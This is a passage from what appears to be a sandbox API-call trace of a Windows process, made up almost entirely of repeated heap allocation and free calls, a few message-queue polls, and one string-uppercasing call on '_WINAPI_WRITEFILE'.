| out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0182.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0182.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0182.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0182.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0182.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0182.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0182.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0182.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0182.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0182.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0182.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.549] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0182.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0182.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0182.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0182.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0182.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0182.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0182.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0182.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0182.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0182.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0182.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.550] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0182.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0182.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0182.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0182.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0182.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0182.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0182.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0182.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0182.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0182.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0182.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0182.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0182.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c0988 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0182.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0182.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0182.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0182.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0182.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0182.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0182.553] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0182.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0182.553] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0182.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0182.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0182.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0182.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0182.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0182.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0182.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0182.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b60 [0182.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0182.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0182.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0182.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0182.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0182.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0182.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0182.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0182.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0182.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0182.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0182.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0182.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0182.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0182.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0182.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0182.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0182.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ad0 [0182.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0182.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0182.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0182.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b50 [0182.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0182.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9c0 [0182.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0182.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0182.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0182.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0182.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0182.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0182.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0182.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0182.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0182.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0182.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0182.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0182.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0182.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0182.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0182.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0182.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0182.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0182.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0182.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0182.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0182.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0182.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0182.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0182.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0182.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0182.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0182.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0182.555] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0182.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0182.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0182.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0182.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0182.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0182.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0182.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0182.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0182.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0182.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0182.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0182.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0182.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0182.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0182.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0182.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0182.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0182.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0182.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0182.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0182.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0182.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0182.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0182.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0182.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0182.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0182.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0182.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0182.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0182.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0182.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0182.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0182.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0182.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0182.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0182.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0182.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0182.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0182.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0182.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0182.558] RtlAllocateHeap 